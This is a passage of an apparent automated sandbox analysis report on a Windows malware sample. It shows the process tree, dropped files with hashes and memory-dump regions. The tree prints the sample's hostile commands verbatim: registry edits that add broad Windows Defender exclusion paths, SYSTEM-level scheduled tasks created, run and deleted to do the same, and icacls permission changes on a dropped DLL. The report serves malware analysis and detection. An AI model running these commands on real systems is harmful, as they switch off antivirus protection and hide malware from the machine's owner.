                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:2592
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:4428
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • System Location Discovery: System Language Discovery
                                PID:4960
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:1824
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:428
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4204
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\TlfmGo\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:5932
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\TlfmGo\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:908
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • System Location Discovery: System Language Discovery
                                PID:4672
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2536
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1832
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:6132
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • System Location Discovery: System Language Discovery
                                PID:6052
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:4172
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5116
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                    PID:3344
                            • C:\Users\Public\dr2Cs2\NFAF8C.exe
                              "C:\Users\Public\dr2Cs2\NFAF8C.exe"
                              1⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:3848
                            • C:\Windows\system32\cmd.exe
                              "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\dr2Cs2" /t REG_DWORD /d 0 /f
                              1⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:5248
                              • C:\Windows\System32\reg.exe
                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\dr2Cs2" /t REG_DWORD /d 0 /f
                                2⤵
                                • Windows security bypass
                                PID:1440
                            • C:\Windows\system32\cmd.exe
                              cmd.exe
                              1⤵
                                PID:1932
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:4492
                                • C:\Windows\System32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:4140
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:5792
                                • C:\Windows\System32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:1296
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:1772
                                • C:\Windows\System32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:2168
                              • C:\Program Files (x86)\TlfmGo\TlfmGo.exe
                                "C:\Program Files (x86)\TlfmGo\TlfmGo.exe"
                                1⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                PID:3760
                              • C:\Program Files (x86)\cvdSi\E9bTq.exe
                                "C:\Program Files (x86)\cvdSi\E9bTq.exe"
                                1⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                PID:5968
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\TlfmGo" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                PID:1296
                                • C:\Windows\System32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\TlfmGo" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:5756
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                PID:4232
                                • C:\Windows\System32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:4244
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                PID:4416
                                • C:\Windows\System32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:5524
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                PID:2988
                                • C:\Windows\System32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:4476
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                PID:2008
                                • C:\Windows\System32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                  2⤵
                                    PID:5848
                                • C:\Program Files (x86)\TlfmGo\TlfmGo.exe
                                  "C:\Program Files (x86)\TlfmGo\TlfmGo.exe"
                                  1⤵
                                    PID:2712
                                  • C:\Program Files (x86)\cvdSi\E9bTq.exe
                                    "C:\Program Files (x86)\cvdSi\E9bTq.exe"
                                    1⤵
                                      PID:5556
                                    • C:\ProgramData\bDdCSBxl.exe
                                      "C:\ProgramData\bDdCSBxl.exe"
                                      1⤵
                                        PID:1964
                                      • C:\ProgramData\n5CWFYHg\AqIFQndV.exe
                                        "C:\ProgramData\n5CWFYHg\AqIFQndV.exe"
                                        1⤵
                                          PID:5776
                                        • C:\ProgramData\VGTWzlqp\AK2zfV1e.exe
                                          "C:\ProgramData\VGTWzlqp\AK2zfV1e.exe" 1776
                                          1⤵
                                            PID:4872

                                          Network

                                                MITRE ATT&CK Enterprise v16

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                TlfmGo.exe

                                                • Path C:\Program Files (x86)\TlfmGo\TlfmGo.exe
                                                • Size 145KB
                                                • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                XPSPLOG.dll

                                                • Path C:\Program Files (x86)\TlfmGo\XPSPLOG.dll
                                                • Size 4.6MB
                                                • SHA256 72d01f017b3699bb5523528221af59b1bf7e6bfca7a3d89d618d0173a7d61ae7
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                image.png

                                                • Path C:\Program Files (x86)\TlfmGo\image.png
                                                • Size 5.0MB
                                                • SHA256 6dbc6b5aabbb0d66a91d773e2daf763d15e1da021682d62f8986c2fc83601948
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                thumbs.db

                                                • Path C:\Program Files (x86)\TlfmGo\thumbs.db
                                                • Size 358KB
                                                • SHA256 0988cc986cb8042730274ce4cc0ffa366d84cb75201997de4a9ad0536f195a80
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                XPSPLOG.dll

                                                • Path C:\Program Files (x86)\cvdSi\XPSPLOG.dll
                                                • Size 4.6MB
                                                • SHA256 bd7e1601d75b5fc2a540f1f8ac19f35e222d8b42576c70cb875d5e2644d95c80
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                image.png

                                                • Path C:\Program Files (x86)\cvdSi\image.png
                                                • Size 5.0MB
                                                • SHA256 9791348dd64d14ca0129e3f0aa85eb1da9fa4f4556893ae1a6a705d06b156ddc
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                AK2zfV1e.exe

                                                • Path C:\ProgramData\VGTWzlqp\AK2zfV1e.exe
                                                • Size 663KB
                                                • SHA256 618f017890ee2fd462ee8008b55c292b65c0301ca86250f49df19292584cd228
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                bDdCSBxl.exe

                                                • Path C:\ProgramData\bDdCSBxl.exe
                                                • Size 2.8MB
                                                • SHA256 37642bdc2257086b2e40526c74ee338fe6cb5a136aa7b6c0f0362544d1fad69a
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                AqIFQndV.dat

                                                • Path C:\ProgramData\n5CWFYHg\AqIFQndV.dat
                                                • Size 56KB
                                                • SHA256 d60cbf2bdb6f4d870bb5d859a53d1a7895c0a007c91e413eff61d38d189b61ad
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                AqIFQndV.exe

                                                • Path C:\ProgramData\n5CWFYHg\AqIFQndV.exe
                                                • Size 475KB
                                                • SHA256 3a1b501cf37fb7a9b1fcff078c86d223596e2e991869a8ced63db697c7ec2295
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                AqIFQndV.png

                                                • Path C:\ProgramData\n5CWFYHg\AqIFQndV.png
                                                • Size 167KB
                                                • SHA256 e5c4efbccc66404b866734f65732b9ff1208d6fd911f4b83cf458106fafe732d
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B

                                                • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B
                                                • Size 1KB
                                                • SHA256 5bf784fda01074e9e94506d6e4612dfc266567c5bf02bc49a20d146b6cfae73e
                                                • MD5 SHA1 SHA512 TLSH

                                                B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240

                                                • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240
                                                • Size 1KB
                                                • SHA256 bd4b7eef48c55497a9e871147e89d44f1cfbc329e53ccaabf91237eb53241b61
                                                • MD5 SHA1 SHA512 TLSH

                                                D077F3BA01F0F2293C650040B1B80D25_316FB5D99935E27840887D26EA90D4BD

                                                • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D077F3BA01F0F2293C650040B1B80D25_316FB5D99935E27840887D26EA90D4BD
                                                • Size 1KB
                                                • SHA256 5fdf78df90927d76ff12f80fc0311f4e45d77c4cecb3485698d84ff7af74bf29
                                                • MD5 SHA1 SHA512 TLSH

                                                0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B

                                                • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B
                                                • Size 508B
                                                • SHA256 23b794d9da25056feac7c4a01a0dd51ea5ed260e05ff83bd0046d120fad271be
                                                • MD5 SHA1 SHA512 TLSH

                                                B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240

                                                • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240
                                                • Size 510B
                                                • SHA256 5cc637dfda7c7f82dadc85ad12431ee57879ec5af0e8c31d082bd21a0af07205
                                                • MD5 SHA1 SHA512 TLSH

                                                D077F3BA01F0F2293C650040B1B80D25_316FB5D99935E27840887D26EA90D4BD

                                                • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D077F3BA01F0F2293C650040B1B80D25_316FB5D99935E27840887D26EA90D4BD
                                                • Size 540B
                                                • SHA256 8437ab44abcd71b1af6eb60f9c812a255ef7af6f39e2814cec07fa5d7c4fbdd6
                                                • MD5 SHA1 SHA512 TLSH

                                                StartupProfileData-NonInteractive

                                                • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                • Size 1KB
                                                • SHA256 d003e52ff8c608270543f735431b85a3077ada055b8b70725c6bfc00bf9fc413
                                                • MD5 SHA1 SHA512 TLSH

                                                __PSScriptPolicyTest_ktdhxx3c.jds.ps1

                                                • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ktdhxx3c.jds.ps1
                                                • Size 60B
                                                • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                • MD5 SHA1 SHA512 TLSH

                                                destopbak.ini

                                                • Path C:\Users\Public\Music\destopbak.ini
                                                • Size 2B
                                                • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                                • MD5 SHA1 SHA512

                                                NFAF8C.exe

                                                • Path C:\Users\Public\dr2Cs2\NFAF8C.exe
                                                • Size 135KB
                                                • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                UxEnhance64.dll

                                                • Path C:\Users\Public\dr2Cs2\UxEnhance64.dll
                                                • Size 3.1MB
                                                • SHA256 fbac9b0721d680741d175870717133b1a2af7ce7ea85a00538ddd298edd8d38d
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                adoresd.dat

                                                • Path C:\Users\Public\dr2Cs2\adoresd.dat
                                                • Size 4.7MB
                                                • SHA256 679467016a7f6ee6142e267ede8da312562890de337109a8dfcbd677b5c9de00
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                msadox.tb

                                                • Path C:\Users\Public\dr2Cs2\msadox.tb
                                                • Size 8KB
                                                • SHA256 f7af1a75c9e85985f6b9b38156bb9af1cfc522cd0ca77b39d623b29f998ef1de
                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                xxxx.ini

                                                • Path \??\c:\xxxx.ini
                                                • Size 2B
                                                • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                                • MD5 SHA1 SHA512

                                                memory/2408-787-0x0000000007EC0000-0x0000000007F56000-memory.dmp

                                                memory/2408-778-0x000000006F830000-0x000000006F87C000-memory.dmp

                                                memory/2408-788-0x0000000007E40000-0x0000000007E51000-memory.dmp

                                                memory/2408-766-0x00000000065E0000-0x000000000693B000-memory.dmp

                                                memory/2408-786-0x0000000007CC0000-0x0000000007CCA000-memory.dmp

                                                memory/2408-784-0x0000000007C50000-0x0000000007C6A000-memory.dmp

                                                memory/2408-783-0x00000000082A0000-0x000000000891C000-memory.dmp

                                                memory/2408-782-0x0000000007B00000-0x0000000007BA3000-memory.dmp

                                                memory/2408-759-0x00000000033F0000-0x0000000003426000-memory.dmp

                                                memory/2408-777-0x00000000078B0000-0x00000000078E6000-memory.dmp

                                                memory/2408-781-0x0000000007890000-0x00000000078B0000-memory.dmp

                                                memory/2408-764-0x00000000062F0000-0x0000000006356000-memory.dmp

                                                memory/2408-769-0x0000000006A70000-0x0000000006ABC000-memory.dmp

                                                memory/2408-768-0x0000000006530000-0x000000000654E000-memory.dmp

                                                memory/2408-765-0x0000000006570000-0x00000000065D6000-memory.dmp

                                                memory/2408-761-0x0000000006170000-0x0000000006192000-memory.dmp

                                                memory/2408-760-0x0000000005B20000-0x000000000616A000-memory.dmp

                                                memory/2632-684-0x0000000003800000-0x0000000004003000-memory.dmp

                                                memory/2632-713-0x0000000010000000-0x0000000010061000-memory.dmp

                                                memory/2632-676-0x0000000001400000-0x0000000001401000-memory.dmp

                                                memory/2632-681-0x0000000003800000-0x0000000004003000-memory.dmp

                                                memory/2632-683-0x0000000002BD0000-0x0000000002BD1000-memory.dmp

                                                memory/2632-775-0x0000000003800000-0x0000000004003000-memory.dmp

                                                memory/2632-791-0x0000000005670000-0x00000000056A1000-memory.dmp

                                                memory/2632-688-0x0000000003800000-0x0000000004003000-memory.dmp

                                                memory/2632-695-0x0000000002C20000-0x0000000002C34000-memory.dmp

                                                memory/2632-707-0x0000000003800000-0x0000000004003000-memory.dmp

                                                memory/2632-716-0x0000000003800000-0x0000000004003000-memory.dmp

                                                memory/2632-677-0x00000000751D0000-0x000000007591A000-memory.dmp

                                                memory/2712-805-0x0000000001390000-0x0000000001391000-memory.dmp

                                                memory/2712-806-0x00000000751D0000-0x000000007591A000-memory.dmp

                                                memory/2712-813-0x0000000003AD0000-0x00000000042D3000-memory.dmp

                                                memory/2712-821-0x0000000002EE0000-0x0000000002EE1000-memory.dmp

                                                memory/2712-825-0x0000000001390000-0x0000000001391000-memory.dmp

                                                memory/2712-822-0x0000000003AD0000-0x00000000042D3000-memory.dmp

                                                memory/3364-0-0x0000000000B30000-0x0000000000B3E000-memory.dmp

                                                memory/3364-526-0x00007FFCBFA20000-0x00007FFCBFA32000-memory.dmp

                                                memory/3364-525-0x0000000000B30000-0x0000000000B3E000-memory.dmp

                                                memory/3364-503-0x00007FFCBFA20000-0x00007FFCBFA32000-memory.dmp

                                                memory/3364-1-0x0000000000B40000-0x0000000000B4C000-memory.dmp

                                                memory/3760-729-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

                                                memory/3760-738-0x0000000003650000-0x0000000003E53000-memory.dmp

                                                memory/3760-754-0x00000000011D0000-0x00000000011D1000-memory.dmp

                                                memory/3760-755-0x0000000003650000-0x0000000003E53000-memory.dmp

                                                memory/3760-730-0x00000000751D0000-0x000000007591A000-memory.dmp

                                                memory/3760-758-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

                                                memory/3848-579-0x00007FFCC9B00000-0x00007FFCC9B02000-memory.dmp

                                                memory/3848-588-0x00007FFCC9AF0000-0x00007FFCC9AF2000-memory.dmp

                                                memory/3848-584-0x000001EB2D920000-0x000001EB2E1A7000-memory.dmp

                                                memory/3848-587-0x000001EB2D920000-0x000001EB2E1A7000-memory.dmp

                                                memory/3848-586-0x000001EB2D920000-0x000001EB2E1A7000-memory.dmp

                                                memory/3848-573-0x00007FFCA6EF0000-0x00007FFCA740E000-memory.dmp

                                                memory/3848-577-0x000001EB2D920000-0x000001EB2E1A7000-memory.dmp

                                                memory/3848-585-0x000001EB2D920000-0x000001EB2E1A7000-memory.dmp

                                                memory/3848-580-0x000001EB2D920000-0x000001EB2E1A7000-memory.dmp

                                                memory/4872-873-0x00007FF78ABA0000-0x00007FF78AFCF000-memory.dmp

                                                memory/5152-603-0x000001F92A2E0000-0x000001F92A302000-memory.dmp

                                                memory/5152-606-0x000001F92A340000-0x000001F92A35E000-memory.dmp

                                                memory/5152-607-0x000001F92A380000-0x000001F92A432000-memory.dmp

                                                memory/5152-609-0x000001F92A360000-0x000001F92A36A000-memory.dmp

                                                memory/5492-544-0x0000026BF3990000-0x0000026BF4217000-memory.dmp

                                                memory/5492-558-0x0000026BF4360000-0x0000026BF43EA000-memory.dmp

                                                memory/5492-531-0x00007FFCC9AF0000-0x00007FFCC9AF2000-memory.dmp

                                                memory/5492-532-0x00007FFCA6EF0000-0x00007FFCA740E000-memory.dmp

                                                memory/5492-537-0x0000026BF3990000-0x0000026BF4217000-memory.dmp

                                                memory/5492-567-0x0000026BF3990000-0x0000026BF4217000-memory.dmp

                                                memory/5492-566-0x0000026BF3990000-0x0000026BF4217000-memory.dmp

                                                memory/5492-564-0x0000026BF3990000-0x0000026BF4217000-memory.dmp

                                                memory/5492-557-0x0000026BF4260000-0x0000026BF42AE000-memory.dmp

                                                memory/5492-547-0x0000026BF3990000-0x0000026BF4217000-memory.dmp

                                                memory/5492-561-0x0000026BF4360000-0x0000026BF43EA000-memory.dmp

                                                memory/5492-562-0x0000026BF4360000-0x0000026BF43EA000-memory.dmp

                                                memory/5492-539-0x00007FFCC9B00000-0x00007FFCC9B02000-memory.dmp

                                                memory/5492-540-0x0000026BF3990000-0x0000026BF4217000-memory.dmp

                                                memory/5492-559-0x0000026BF4360000-0x0000026BF43EA000-memory.dmp

                                                memory/5492-545-0x0000026BF3990000-0x0000026BF4217000-memory.dmp

                                                memory/5492-551-0x0000026BF3990000-0x0000026BF4217000-memory.dmp

                                                memory/5492-546-0x0000026BF3990000-0x0000026BF4217000-memory.dmp

                                                memory/5556-815-0x00000000034D0000-0x0000000003CD3000-memory.dmp

                                                memory/5556-826-0x0000000000F60000-0x0000000000F61000-memory.dmp

                                                memory/5556-827-0x00000000034D0000-0x0000000003CD3000-memory.dmp

                                                memory/5556-830-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

                                                memory/5556-809-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

                                                memory/5556-810-0x0000000072B00000-0x000000007324A000-memory.dmp

                                                memory/5776-841-0x0000000000400000-0x000000000053F000-memory.dmp

                                                memory/5968-748-0x0000000073680000-0x0000000073DCA000-memory.dmp

                                                memory/5968-774-0x00000000005A0000-0x00000000005A1000-memory.dmp

                                                memory/5968-747-0x00000000005A0000-0x00000000005A1000-memory.dmp

                                                memory/5968-770-0x0000000000850000-0x0000000000851000-memory.dmp

                                                memory/5968-771-0x0000000002FD0000-0x00000000037D3000-memory.dmp

                                                memory/5968-752-0x0000000002FD0000-0x00000000037D3000-memory.dmp